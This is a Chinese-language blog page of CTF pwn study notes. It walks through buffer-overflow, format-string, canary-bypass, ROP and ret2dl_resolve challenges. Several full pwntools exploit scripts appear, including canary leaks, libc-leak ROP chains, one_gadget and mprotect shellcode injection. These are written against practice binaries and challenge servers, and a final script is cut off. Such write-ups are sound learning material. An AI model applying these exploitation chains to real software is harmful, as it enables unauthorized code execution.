<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>pwn 学习 | Hexo</title><meta name="author" content="John Doe"><meta name="copyright" content="John Doe"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="攻防世界when_did_you_born修改文件名为 my 使用file my查看文件64位elf文件 丢入ida中查看伪代码可以发现第一个要求是让你输入不是1926的数否则异常退出，第二个要求是你第一次输入的数一定是1926，否则退出，自然发生矛盾，看见了get 函数，可以覆盖溢出双击v4可以发现v4(第二次输入)和v5(第一次输入)相差8个字节，所以构造exp执行得到flag hello_p">
<meta property="og:type" content="article">
<meta property="og:title" content="pwn 学习">
<meta property="og:url" content="http://example.com/2020/11/28/pwn-%E5%AD%A6%E4%B9%A0/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="攻防世界when_did_you_born修改文件名为 my 使用file my查看文件64位elf文件 丢入ida中查看伪代码可以发现第一个要求是让你输入不是1926的数否则异常退出，第二个要求是你第一次输入的数一定是1926，否则退出，自然发生矛盾，看见了get 函数，可以覆盖溢出双击v4可以发现v4(第二次输入)和v5(第一次输入)相差8个字节，所以构造exp执行得到flag hello_p">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg">
<meta property="article:published_time" content="2020-11-28T08:53:32.000Z">
<meta property="article:modified_time" content="2021-05-09T05:58:37.843Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2020/11/28/pwn-%E5%AD%A6%E4%B9%A0/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: 'Just',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  ClickShowText: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    jQuery: 'https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js',
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
    },
    fancybox: {
      js: 'https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js',
      css: 'https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}

// https://stackoverflow.com/questions/16839698/jquery-getscript-alternative-in-native-javascript
const getScript = url => new Promise((resolve, reject) => {
  const script = document.createElement('script')
  script.src = url
  script.async = true
  script.onerror = reject
  script.onload = script.onreadystatechange = function() {
    const loadState = this.readyState
    if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
    script.onload = script.onreadystatechange = null
    resolve()
  }
  document.head.appendChild(script)
})</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2021-05-09 13:58:37'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(function () {  window.activateDarkMode = function () {
    document.documentElement.setAttribute('data-theme', 'dark')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
    }
  }
  window.activateLightMode = function () {
    document.documentElement.setAttribute('data-theme', 'light')
   if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
    }
  }
  const autoChangeMode = 'false'
  const t = saveToLocal.get('theme')
  if (autoChangeMode === '1') {
    const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
    const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
    const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
    const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified
    if (t === undefined) {
      if (isLightMode) activateLightMode()
      else if (isDarkMode) activateDarkMode()
      else if (isNotSpecified || hasNoSupport) {
        const now = new Date()
        const hour = now.getHours()
        const isNight = hour <= 6 || hour >= 18
        isNight ? activateDarkMode() : activateLightMode()
      }
      window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
        if (saveToLocal.get('theme') === undefined) {
          e.matches ? activateDarkMode() : activateLightMode()
        }
      })
    } else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else if (autoChangeMode === '2') {
    const now = new Date()
    const hour = now.getHours()
    const isNight = hour <= 6 || hour >= 18
    if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
    else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else {
    if (t === 'dark') activateDarkMode()
    else if (t === 'light') activateLightMode()
  }const asideStatus = saveToLocal.get('aside-status')
if (asideStatus !== undefined) {
   if (asideStatus === 'hide') {
     document.documentElement.classList.add('hide-aside')
   } else {
     document.documentElement.classList.remove('hide-aside')
   }
}})()</script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
</head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="author-avatar"><img class="avatar-img" src="/null" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data"><div class="data-item is-center"><div class="data-item-link"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">4</div></a></div></div></div><hr/></div></div><div id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url(https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Hexo</a></span><div id="menus"><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">pwn 学习</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2020-11-28T08:53:32.000Z" title="Created 2020-11-28 16:53:32">2020-11-28</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2021-05-09T05:58:37.843Z" title="Updated 2021-05-09 13:58:37">2021-05-09</time></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post View:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h2 id="攻防世界"><a href="#攻防世界" class="headerlink" title="攻防世界"></a>攻防世界</h2><h3 id="when-did-you-born"><a href="#when-did-you-born" class="headerlink" title="when_did_you_born"></a>when_did_you_born</h3><p>修改文件名为 my 使用file my查看文件<br><img src="/6.png"><br>64位elf文件 丢入ida中查看伪代码<br><img src="/7.png"><br>可以发现第一个要求是让你输入不是1926的数否则异常退出，第二个要求是你第一次输入的数一定是1926，否则退出，自然发生矛盾，看见了get 函数，可以覆盖溢出<br>双击v4<br><img src="/8.png"><br>可以发现v4(第二次输入)和v5(第一次输入)相差8个字节，所以构造exp<br><img src="/9.png"><br>执行<br><img src="/10.png"><br>得到flag</p>
<h3 id="hello-pwn"><a href="#hello-pwn" class="headerlink" title="hello_pwn"></a>hello_pwn</h3><p>修改文件名为33，丢入64位ida中查看主函数，<br><img src="/c.png"><br>可以发现read漏洞函数，解读函数，发现是输入到unk_601068，而if条件要求的是dword_60106C，双击查看<br><img src="/d.png"><br>二者之间只相差4个字节，意思是我输入4个字节之后，后面输入的都进入了dword_60106C里面，所以构造exp<br><img src="/e.png"><br>执行得到flag<br><img src="/f.png"></p>
<h3 id="level0"><a href="#level0" class="headerlink" title="level0"></a>level0</h3><p>附件为64位elf文件，拖入ida中查看伪代码<br>找到漏洞函数read<br><img src="/201.png"><br>找到给的后门<br><img src="/202.png"><br>找到system函数的地址<br><img src="/203.png"><br>构造exp<br><img src="/204.png"><br>最后得到flag</p>
<h3 id="level2"><a href="#level2" class="headerlink" title="level2"></a>level2</h3><p>附件为32位elf文件，拖入ida中查看伪代码<br>找到漏洞函数 read，变量blf大小为0x88 而read能读取的长度为0x100，所以可以溢出覆盖<br><img src="/205.png"><br><img src="/206.png"><br>因为rop方式即为修改返回地址，让其指向内存中已有的一段指令<br>找到system的指令地址<br><img src="/207.png"><br>在字符串窗口找到存储”/bin/sh”的所在位置<br><img src="/208.png"><br>所以构造exp<br><img src="/209.png"></p>
<h3 id="CGfsb"><a href="#CGfsb" class="headerlink" title="CGfsb"></a>CGfsb</h3><p>附件为32位elf文件，拖入ida中查看伪代码<br>根据提示，发现函数printf，查找资料后，明白其为格式化字符串漏洞<br>pfintf(“%d”,a)与pfintf(a)不同，后者如果输入时，printf函数并不知道参数个数，它的内部有个指针，用来索检格式化字符串。<br>对于特定类型%，就去取相应参数的值，直到索检到格式化字符串结束。<br><img src="/aa.png"><br>可以通过输入若干个%08x来找到偏移量<br><img src="/ab.png"><br>找到 61616161即为输入的s，可以数出偏移量为10<br>所以构造exp<br>from pwn import *<br>context.log_level = ‘debug’<br>p = remote(‘111.200.241.244’,’56721’)<br>p.recvuntil(‘please tell me your name:’)<br>p.sendline(‘123’)<br>p.recvuntil(‘leave your message please:’)<br>payload=p32(0x804A068)+’aaaa%10$n’<br>p.sendline(paylaod)<br>p.interactive()<br>最后成功得到flag</p>
<h3 id="dice-game"><a href="#dice-game" class="headerlink" title="dice_game"></a>dice_game</h3><p>64位elf文件，丢入ida查看伪代码<br><img src="/ac.png"><br>发现seed ，跟进sub_A20<br><img src="/ac.png"><br>发现rand()%6+1;<br>找到获取flag的要求<br><img src="/ae.png"><br>大概意思就是输入50次1~6，然后都要和rand()%6+1相等，所以可以在输入名字的时候，进行覆盖，覆盖到seed(即种子)<br>从而，达到要求，然后利用fopen函数，得到flag<br>所以，构造exp如下<br>from pwn import *<br>from ctypes import *</p>
<p>context.log_level = ‘debug’</p>
<p>p = process(“./x”)<br>elf = ELF(“./x”)<br>libc = cdll.LoadLibrary(“libc.so.6”)</p>
<p>payload = ‘a’*0x40 + p64(0)<br>p.recvuntil(“name:”)<br>p.sendline(payload)</p>
<p>for _ in range(50):<br>    p.recvuntil(‘Give me the point’)<br>    p.sendline(str(libc.rand()%6+1))</p>
<p>p.interactive()<br>因为攻防世界没法获取在线场景，只能在本地执行了。</p>
<h3 id="mary-morton"><a href="#mary-morton" class="headerlink" title="mary_morton"></a>mary_morton</h3><p>64位elf文件，查看伪代码<br><img src="/af.png"><br>悉心的提示了，选1进入栈溢出，选2进入格式化字符串漏洞，选3退出。<br><img src="/ah.png"><br>找到了给的后门函数。<br><img src="/ai.png"><br>函数逻辑：两个while循环，先判断是否进入格式化字符串漏洞，再判断是否进入栈溢出，只有选3才会彻底退出循环，否则会一直循环下去。<br>checksec 查壳：<br>Arch:     amd64-64-little<br>    RELRO:    Partial RELRO<br>    Stack:    Canary found<br>    NX:       NX enabled<br>    PIE:      No PIE (0x400000)</p>
<p>有 nx 防护 不能进行shellcode 还有canary 防护，这时候栈帧情况如下,<br><img src="/cc.png"><br><img src="/aj.png"><br>根据程序可以看出，canary的值即为v2的值，所以我们可以通过格式化字符串漏洞泄露v2的值，然后再利用read函数填入后门函数的地址，从而获得flag<br>首先，计算偏移<br><img src="/aj.png"><br>可以发现偏移量为6，又因为，buf和v2本来的差距就有0x90-8h=0x88 0x88/0x8=0x11(十进制17)所以偏移就为 17+6=23<br>所以构造exp如下：</p>
<p>from pwn import *</p>
<p>context.log_level = ‘debug’<br>p = procese(“./x”)</p>
<p>p.recvuntil(“Exit the battle “)<br>p.sendline(str(2))                                  #先进入格式化函数泄漏cannary<br>p.sendline(“%23$p”)                                 #泄漏cannary<br>p.recvuntil(“0x”)<br>canary = int(p.recv(16),16)#接收16个字节</p>
<p>p.recvuntil(“Exit the battle “)<br>payload = “a”*0x88 + p64(canary) + “a”*8 + p64(0x04008DA)<br>p.sendline(str(1))<br>p.sendline(payload)</p>
<p>p.interactive()</p>
<h3 id="string"><a href="#string" class="headerlink" title="string"></a>string</h3><h2 id="Buuctf"><a href="#Buuctf" class="headerlink" title="Buuctf"></a>Buuctf</h2><h3 id="rip"><a href="#rip" class="headerlink" title="rip"></a>rip</h3><p>附件为64位elf文件，拖入ida<br>找到留的后门函数——fun，及get危险函数<br><img src="/210.png"><br>找到system函数地址<br><img src="/211.png"><br>构造exp并获取flag<br><img src="/212.png"><br><img src="/213.png"></p>
<h3 id="pwn1-sctf-2016"><a href="#pwn1-sctf-2016" class="headerlink" title="pwn1_sctf_2016"></a>pwn1_sctf_2016</h3><p>附件为32位elf文件<br>查看主函数，发现唯一的输入是fget函数，变量s大小为60，而fget只输入32，无法溢出，但是看见后面会将I转变为you<br>所以能完成溢出<br><img src="/214.png"><br><img src="/215.png"><br>找到给的后门函数的地址<br><img src="/216.png"><br>构造exp并成功获得flag<br><img src="/217.png"><br><img src="/218.png"></p>
<h3 id="ciscn-2019-n-1"><a href="#ciscn-2019-n-1" class="headerlink" title="ciscn_2019_n_1"></a>ciscn_2019_n_1</h3><p>查看伪代码，发现get函数<br><img src="/43.png"><br>同时也看见了获得flag的条件，需要v2==11.28125<br>点进去可以发现v1与v2相差(0x30-0x4)个字节<br>所以构造exp<br><img src="/44.png"></p>
<h3 id="get-started-3dsctf-2016"><a href="#get-started-3dsctf-2016" class="headerlink" title="get_started_3dsctf_2016"></a>get_started_3dsctf_2016</h3><p>32位elf文件，查看伪代码，有一个直接的gets 函数，且附有get flag 函数。shift + f12 没有找到bin/sh 和system<br><img src="/219.png"><br>所以我们可以利用get flag 函数来获取flag<br>查看if 条件，要求满足两个变量的赋值；<br><img src="/220.png"><br>可以直接将返回地址溢出成带参数的，构造payload ：偏移+’ebp’+get flag初始地址+get flag返回地址+参数1+参数2<br>因为打远程时，如果程序是异常退出了，最后是不给你回显的，所以将get flag 返回地址代替为 exit 的地址<br>所以exp 如下：<br>from pwn import*<br>context.log_level = ‘debug’<br>#sh = process(‘./get’)<br>sh=remote(‘node3.buuoj.cn’,’25022’)<br>payload = ‘a’*56<br>payload += p32(0x080489A0) + p32(0x0804E6A0)<br>payload += p32(0x308CD64F) + p32(0x195719D1)<br>sh.sendline(payload)<br>sh.interactive()</p>
<p>最后获得flag</p>
<p>同时也可以利用mprotect函数<br>因为没有开启pie防护，所以每次运行程序的函数地址是不回改变的。<br>我们可以溢出，然后传入mprotect 函数的地址，将一段数据修改为可读可写可执行<br>大佬的exp：</p>
<p>1 from pwn import *<br> 2 q = remote(‘node3.buuoj.cn’,29645)<br> 3 #q = process(‘./get_started_3dsctf_2016’)<br> 4 context.log_level = ‘debug’<br> 5<br> 6 mprotect = 0x0806EC80<br> 7 buf = 0x80ea000<br> 8 pop_3_ret = 0x0804f460<br> 9 read_addr = 0x0806E140<br>10<br>11 payload = ‘a’*56<br>12 payload += p32(mprotect)<br>13 payload += p32(pop_3_ret)<br>14 payload += p32(buf)<br>15 payload += p32(0x1000)<br>16 payload += p32(0x7)<br>17 payload += p32(read_addr)<br>18 payload += p32(buf)<br>19 payload += p32(0)<br>20 payload += p32(buf)<br>21 payload += p32(0x100)<br>22 q.sendline(payload)<br>23 sleep(0.1)<br>24<br>25 shellcode = asm(shellcraft.sh(),arch=’i386’,os=’linux’)<br>26 q.sendline(shellcode)<br>27 sleep(0.1)<br>28 q.interactive()</p>
<h2 id="Hgame"><a href="#Hgame" class="headerlink" title="Hgame"></a>Hgame</h2><h3 id="whitegive"><a href="#whitegive" class="headerlink" title="whitegive"></a>whitegive</h3><p>考的主要就是双等号，文件直接给了源代码的，连接上去，要求给出密码<br><img src="/40.png"><br>==主要是比较的地址所以只需要用ida打开，在view窗口找到密码的地址就好了<br><img src="/41.png"><br>直接发送即可获得flag<br><img src="/42.png"></p>
<h2 id="格式化字符串漏洞"><a href="#格式化字符串漏洞" class="headerlink" title="格式化字符串漏洞"></a>格式化字符串漏洞</h2><p>格式化字符串漏洞主要是因为错误的使用printf函数如： printf(a) 没有严格按照 printf(“&lt;式样化字符串&gt;”，&lt;参数表&gt;) 的规格来使用，从而导致有机可乘。<br>printf函数并不知道参数个数，它的内部有个指针，用来索检格式化字符串。对于特定类型%，就去取相应参数的值，直到索检到格式化字符串结束。<br>存在格式化字符串漏洞时，我们输入以下是字符串可以得到不同的效果，从而完成我们的目的，对变量进行修改或者读取函数的地址。<br>%d - 十进制 - 输出十进制整数<br>%s - 字符串 - 从内存中读取字符串<br>%x - 十六进制 - 输出十六进制数<br>%c - 字符 - 输出字符<br>%p - 指针 - 指针地址<br>%n - 到目前为止所写的字符数<br>也可以通过%&lt; number &gt;$n(n可以换成s，x，c，p等)来完成对esp+<number>处指向的内存写入或者读取该内存的地址。</number></p>
<p>fmtstr_payload是pwntools里面的一个工具，用来简化对格式化字符串漏洞的构造工作。<br>fmtstr_payload(offset, writes, numbwritten=0, write_size=’byte’)<br>第一个参数表示格式化字符串的偏移；<br>第二个参数表示需要利用%n写入的数据，采用字典形式，我们要将printf的GOT数据改为system函数地址，就写成{printfGOT: systemAddress}；本题是将0804a048处改为0x2223322<br>第三个参数表示已经输出的字符个数，这里没有，为0，采用默认值即可；<br>第四个参数表示写入方式，是按字节（byte）、按双字节（short）还是按四字节（int），对应着hhn、hn和n，默认值是byte，即按hhn写。<br>fmtstr_payload函数返回的就是payload</p>
<h2 id="Canary栈保护"><a href="#Canary栈保护" class="headerlink" title="Canary栈保护"></a>Canary栈保护</h2><p>Canary是一种栈保护手段，通常通过在栈中插入cookie信息（一般在ebp上方），在函数返回的时候检查cookie是否改变，如果改变则认为栈结构被破坏，则调用一个函数强制停止程序。当开启Canary保护的时候不能通过传统的栈溢出直接覆盖返回值劫持EIP。在汇编码的表现为：<br><img src="/az.png"></p>
<p>在栈中的表现为：<br><img src="/al.png"></p>
<p>从栈底拿出事前插入的cookie，然后和fs:28这个数对比，相同就正常返回，不相同会调用stack_chk_fail函数结束程序。</p>
<h3 id="babystack"><a href="#babystack" class="headerlink" title="babystack"></a>babystack</h3><p>64为位elf文件<br>checksec<br>Arch:     amd64-64-little<br>    RELRO:    Full RELRO<br>    Stack:    Canary found<br>    NX:       NX enabled<br>    PIE:      No PIE (0x400000)</p>
<p>除了pie，其他防护全开。<br>拖入ida中，查看伪代码，<br><img src="/ax.png"><br>函数主体简单，输入1，可以使用read函数进行输入； 输入2，输出使用read函数的输入； 输入3，退出循环；<br>因为有canary 栈保护，不能直接利用read 函数进行栈溢出，需要找出cooike 值，<br>因为，s占据0x90，而read可以输入0x100，所以可以输出0x88个a，这样可以将变量和cookie值连接在一起；然后再利用1输出 s，就可以得到cookie值。<br>得到cookie 值后，没有后门函数，也没有直接的 system命令，但题目给了相应的libc，可以利用puts 函数泄露libc的基地址；<br>函数实际地址=函数偏移量+libc基地址；<br>libc=函数实际地址-函数偏移量；<br>这里涉及到了 got表和plt表<br>plt表：跳板，跳转到一个地址来加载libc库。文件中会对每个用到的函数分配一个plt函数<br>got表：经过plt表的跳转会跳转会在got表上写入地址，这个地址是函数调用的真实地址<br>注意：plt表只在程序调用函数之前有用，调用函数之后第二次执行这个函数就不会经过plt表。<br>也就是说 got表中泄露的地址是实际地址，利用pwntools使用命令找到的是偏移地址；<br>因为输入限制，所以不能使用system + /bin/sh 来get shell，可以使用onegadget的值覆盖EIP完成get shell；</p>
<p>one gadget :<br>功能：查找已知的libc中exevce(“/bin/sh”)语句的地址<br>在进行ctf pwn挑战时，我们通常需要一个小工具RCE（远程代码执行），该工具会导致call execve(‘/bin/sh’, NULL, NULL)。<br>这个宝石提供了这样的小工具查找器，无需像傻瓜一样每次都使用objdump或IDA-pro 😉<br>要使用此工具，请输入one_gadget /path/to/libc命令行并享受魔力😆</p>
<p>附上exp：<br>from pwn import *</p>
<p>#p=remote(‘111.198.29.45’,49269)<br>p=process(‘./babystcak’)<br>elf=ELF(‘./babystack’)<br>libcelf=ELF(‘./libc-2.23.so’)<br>one_addr=0x45216             #onegadget地址<br>rdiret_addr=0x0400a93        #pop rdi;r15 ret地址<br>main_addr=0x0400908          #main函数地址<br>put_plt=elf.plt[‘puts’]      #puts的plt表和got表<br>put_got=elf.got[‘puts’]</p>
<p>p.recv()<br>p.sendline(“1”)<br>payload=’a’*0x87+’b’         #一堆a最后带一个b好区分<br>p.send(payload)</p>
<p>p.recv()<br>p.sendline(“2”)<br>p.recvuntil(“ab\n”)          #接收到’ab’为止，后面就是cookie<br>stack_v=p.recv(7)            #cookie长度8，但最后一字节是0<br>stack_v=u64(stack_v.rjust(8,’\x00’))   #一般会接收7位（cookie最后一字节大概率是\x00，需要补齐）u保证了能够读取各种字符串<br>print hex(stack_v)<br>p.recv()<br>p.sendline(“1”)  </p>
<p>payload=’a’*0x88            #padding<br>payload+=p64(stack_v)       #cookie<br>payload+=’a’*8              #cookie和eip之间还有一个ebp<br>payload+=p64(rdiret_addr)   #返回到pop rdi的地方<br>payload+=p64(put_got)       #puts要输处的参数，puts内存中的地址<br>payload+=p64(put_plt)       #调用puts函数<br>payload+=p64(main_addr)     #最后返回main</p>
<p>p.sendline(payload)<br>p.recv()<br>p.sendline(“3”)     #先要退出才能触发payload<br>put_addr=u64(p.recv(8).ljust(8,’\x00’)) #接收puts函数内存中的地址，可能接收不齐，用\x00补齐<br>print hex(put_addr)</p>
<p>one_addr=one_addr+(put_addr-libcelf.symbols[‘puts’]) #计算onegadget内存中的地址<br>p.recv()<br>p.sendline(“1”)<br>payload=’a’*0x88+p64(stack_v)+’a’*8+p64(one_addr)  #还是同样原理构造payload<br>p.sendline(payload)<br>p.interactive()</p>
<h2 id="mprotect-函数"><a href="#mprotect-函数" class="headerlink" title="mprotect  函数"></a>mprotect  函数</h2><p>int mprotect(const void *start, size_t len, int prot);</p>
<p>　　第一个参数填的是一个地址，是指需要进行操作的地址。</p>
<p>　　第二个参数是地址往后多大的长度。</p>
<p>　　第三个参数的是要赋予的权限。</p>
<p>　　mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。</p>
<p>prot可以取以下几个值，并且可以用“|”将几个属性合起来使用：</p>
<p>　　1）PROT_READ：表示内存段内的内容可写；</p>
<p>　　2）PROT_WRITE：表示内存段内的内容可读；</p>
<p>　　3）PROT_EXEC：表示内存段中的内容可执行；</p>
<p>　　4）PROT_NONE：表示内存段中的内容根本没法访问。</p>
<p>　　prot=7 是可读可写可执行 </p>
<h2 id="Rop"><a href="#Rop" class="headerlink" title="Rop"></a>Rop</h2><h3 id="一步一步-ROP-level2"><a href="#一步一步-ROP-level2" class="headerlink" title="一步一步 ROP level2"></a>一步一步 ROP level2</h3><p>没什么难度，直接给了read 漏洞函数，记录只是为了 记住 ldd命令</p>
<p>ldd + 文件名 可以直接找出 文件所用的libc</p>
<p><img src="/221.png"></p>
<p>直接上exp：<br>利用 write 函数泄露got表中的地址，然后查找libc中write 函数的地址，算出基地址，通过 system(bin/sh)获得flag</p>
<p>from pwn import *</p>
<p>p = process(‘./level2’)<br>elf = ELF(‘level2’)<br>libc= ELF(‘/lib32/libc.so.6’)<br>write_plt = elf.plt[‘write’]<br>write_got = elf.got[‘write’]<br>read_plt = elf.plt[‘read’]<br>read_got = elf.got[‘read’]<br>func = 0x08048404</p>
<p>payload = ‘a’ * 140<br>payload += p32(write_plt)<br>payload += p32(func)<br>payload += p32(1)<br>payload += p32(write_got)<br>payload += p32(4)<br>p.sendline(payload)<br>write_addr=u32(p.recv()[0:8])<br>base=write_addr-libc.symbols[‘write’]<br>system=libc.symbols[‘system’]+base<br>binsh=next(libc.search(‘/bin/sh’))+base<br>payload1=’a’ * 140<br>payload1 +=p32(system)+p32(0xdeadbeef)+p32(binsh)<br>p.sendline(payload1)<br>p.interactive()</p>
<h3 id="一步一步-ROP-level5"><a href="#一步一步-ROP-level5" class="headerlink" title="一步一步 ROP level5"></a>一步一步 ROP level5</h3><p>ctf wiki里中级rop的题目，关于 漏洞函数同样也给的很直接明了，就是一个 read 函数 用于栈溢出(重点应该是为了介绍方法)<br>偏移为：0x88<br>这个题目，应该主要是引起寄存器的重要作用吧，汇编语言是真的很重要呀<br>在一篇博客上看见<br>应该这样构造 寄存器的值<br>rbx  0</p>
<p>rbp  1</p>
<p>r12  想调用的函数地址</p>
<p>r13 -&gt;edi 函数第三个参数 </p>
<p>r14 -&gt;rsi 函数第二个参数</p>
<p>r15 -&gt;rdx 函数第一个参数<br>因为<br>.text:00000000004005F9                 call    qword ptr [r12+rbx<em>8]<br>有这一样指令，这个意思就是 引用 r12+rbx</em>8地址的函数 所以 将 rbx 设为0，r12设为想要利用的函数的地址即可(即got表中的地址)</p>
<p>思路： 控制r12为要用的 函数地址，泄露函数真实地址，通过libcsearcher 查找对应的libc版本<br>得到进程的 基地址，然后利用 system(/bin/sh\x00)获取shell<br>即利用read 函数写入 bin/sh 字符串就行<br>exp:</p>
<p>from pwn import *<br>#context.log_level = ‘debug’<br>from LibcSearcher import *</p>
<p>p=process(‘./level5’)</p>
<p>elf=ELF(‘level5’)<br>bss_base = elf.bss()<br>jicun=0x000000400606<br>kaishi=0x0000004005F0<br>write_got=elf.got[‘write’]<br>read_got=elf.got[‘read’]<br>main=0x0400544<br>def csu(rbx,rbp,r12,r13,r14,r15,last):<br>    payload=’a’*0x88+p64(jicun)+p64(rbx)+p64(rbp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)<br>    payload+=p64(kaishi)<br>    payload+=’a’*0x38<br>    payload+=p64(main)<br>    p.sendline(payload)<br>    sleep(1)</p>
<p>csu(0, 1, write_got, 8, write_got, 0, main)<br>write_addr = u64(p.recv()[0:8])<br>libc = LibcSearcher(‘write’, write_addr)<br>base = write_addr - libc.dump(‘write’)<br>system= base + libc.dump(‘system’)</p>
<p>csu(0, 1, read_got, 16, bss_base, 0, main)<br>exp=p64(system)<br>p.sendline(exp+’/bin/sh\x00’)</p>
<p>csu(0, 1, bss_base, 0, 0, bss_base + 8, main)</p>
<p>p.interactive()</p>
<p>最后执行失败了，看了很多博客，其实都差不多，但是我看失败原因，显示没有想匹配的 libc 。。。。。。。。</p>
<h3 id="ret2-dl-resolve"><a href="#ret2-dl-resolve" class="headerlink" title="ret2_dl_resolve"></a>ret2_dl_resolve</h3><p>其实我就直接想复制粘贴别人的博客的，因为写得实在是太好了<br>不利用libc 实在是太难了<br>有libc是真的很方便，怀恋libc<br>程序使用 _dl_runtime_resolve(link_map_obj, reloc_offset) 来对动态链接的函数进行重定位。我们便可以控制相应的参数及其对应地址的内容以此可以控制解析的函数。<br>ELF中有几个段是专门用于动态链接的，比如.dynamic段，.dynsym段（动态链接符号表），.dynstr（动态链接字符串表）。 已经和重定位有关的 .rel.dyn 和 .rel.plt 前者保存数据引用的重定位信息，所修正的位置位于.got以及数据段。后者保存函数引用的重定位信息，所修正的位置位于.got.plt。<br>以 2015-XDCTF-pwn200 为例<br>直接就是一个栈溢出漏洞<br>所以没啥好讲的，直接用就好了<br>思路 ：</p>
<ol>
<li>确定ret地址</li>
</ol>
<p>我们要让程序解析system函数的地址，就需要让程序将我们伪造的 system 的重定位表项，符号表， 符号名以及system的参数读入内存中。因此首先控制sub_80484EB()函数返回到read函数执行。</p>
<ol start="2">
<li>伪造表项</li>
</ol>
<p>计算偏移的公式为：offset= 目的– 基址</p>
<ol start="3">
<li><p>读入伪造的表项</p>
</li>
<li><p>getshell</p>
</li>
</ol>
<p>exp： </p>
<p>from pwn import *<br>import pdb</p>
<p>context.log_level = ‘debug’</p>
<p>#context.terminal = [‘tmux’, ‘spiltw’, ‘-h’]</p>
<p>elf = ELF(‘./200’)</p>
<p>pppr_addr = 0x080485cc # pop esi ; pop edi ; pop ebp ;ret</p>
<p>pop_ebp_addr = 0x08048453 # pop ebp ; ret</p>
<p>leave_ret_addr = 0x08048481 # leave ; ret</p>
<p>write_plt = elf.plt[‘write’]</p>
<p>write_got = elf.got[‘write’]</p>
<p>read_plt = elf.plt[‘read’]</p>
